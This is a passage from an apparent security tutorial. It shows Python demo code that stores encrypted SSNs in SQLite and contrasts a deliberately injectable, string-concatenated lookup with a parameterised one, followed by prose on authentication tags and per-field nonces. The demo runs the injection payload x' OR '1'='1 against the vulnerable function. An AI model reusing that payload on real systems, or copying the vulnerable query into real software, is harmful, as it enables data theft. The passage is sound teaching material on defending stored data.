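    conn.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT, ssn BLOB)")
    for name, ssn in SAMPLE_CUSTOMERS:
        conn.execute("INSERT INTO customers (name, ssn) VALUES (?, ?)",
                     (name, encrypt_field(key, ssn)))
    conn.commit()
    return conn


def lookup_vulnerable(conn, name):
    """The 'before' form: input concatenated into SQL, so a crafted name rewrites the query."""
    sql = "SELECT name, ssn FROM customers WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    """Parameterised query: the input is only ever compared as a value."""
    return conn.execute("SELECT name, ssn FROM customers WHERE name = ?", (name,)).fetchall()


def plaintext_ssn_leaked(rows):
    """True if any returned SSN blob contains a sample SSN in the clear."""
    return any(ssn.encode() in row[1] for row in rows for _, ssn in SAMPLE_CUSTOMERS)


if __name__ == "__main__":
    db = build_db(DEMO_KEY)
    dumped = lookup_vulnerable(db, "x' OR '1'='1")   # injection returns every row...
    print(len(dumped), "rows dumped; cleartext SSN present:", plaintext_ssn_leaked(dumped))
    print("safe lookup with same input:", lookup_safe(db, "x' OR '1'='1"))
    print("application with the key:", decrypt_field(DEMO_KEY, lookup_safe(db, "Alice")[0][1]))
```

    Two design points carry the argument. The tag is checked before anything is decrypted, so a blob altered in the table is rejected rather than silently producing garbage; and the per-field nonce means two customers with the same SSN do not produce the same blob, which keeps an attacker who has dumped the table from spotting duplicates. For a production system the same structure holds with AES-GCM from a vetted library in place of the HMAC keystream.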

    Redmond: Data at Rest Is a Sitting Duck